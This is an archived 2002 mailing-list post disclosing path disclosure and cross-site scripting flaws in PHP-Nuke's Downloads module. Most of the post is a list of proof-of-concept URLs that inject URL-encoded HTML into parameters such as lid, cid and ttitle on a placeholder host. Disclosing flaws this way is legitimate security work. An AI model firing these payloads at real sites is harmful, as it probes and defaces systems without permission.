Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

PHP Nuke All version - ("viewdownload" Path disclosure vulns) + (some XSS)

From: "Replugge [ROD]" <replugge () alcoholico org>
Date: 12 Apr 2002 17:32:49 +0200
PHP NUKE PATH DISCLOSURE AND XSS:


here:
http://nukesite/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E

another one:
http://nukesite/modules.php?name=Downloads&d_op=viewdownload
http://nukesite/modules.php?name=Downloads&d_op=viewdownload&%22%3E
http://nukesite/modules.php?name=Downloads&d_op=viewdownload&cid=
http://nukesite/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here

older versions were also affected:
http://nukesite/download.php?op=viewdownload
http://nukesite/download.php?op=viewdownload&cid=
http://nukesite/download.php?op=viewdownload&cid=%22%3E




There is also some ** XSS **

http://nukesite/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E
Old style:
http://nukesite/download.php?op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E


some more XSS:
http://nukesite/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E
Old style:
http://nukesite/download.php?op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E


Not enough with that:
Here we have one that do both "path disclosure" and "xss"
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E


plus this other one:
http://nukesite/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E


or perhaps modify both them:
http://nukesite/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3C/h1%3E




Best Regards

-- 
/*
Rodrigo Gutierrez                              +47 73546339
rodrigo () trustix com                         +47 98060198
Trustix AS                           http://www.trustix.com
*/
Previous By Date Next
Previous By Thread Next

Current thread: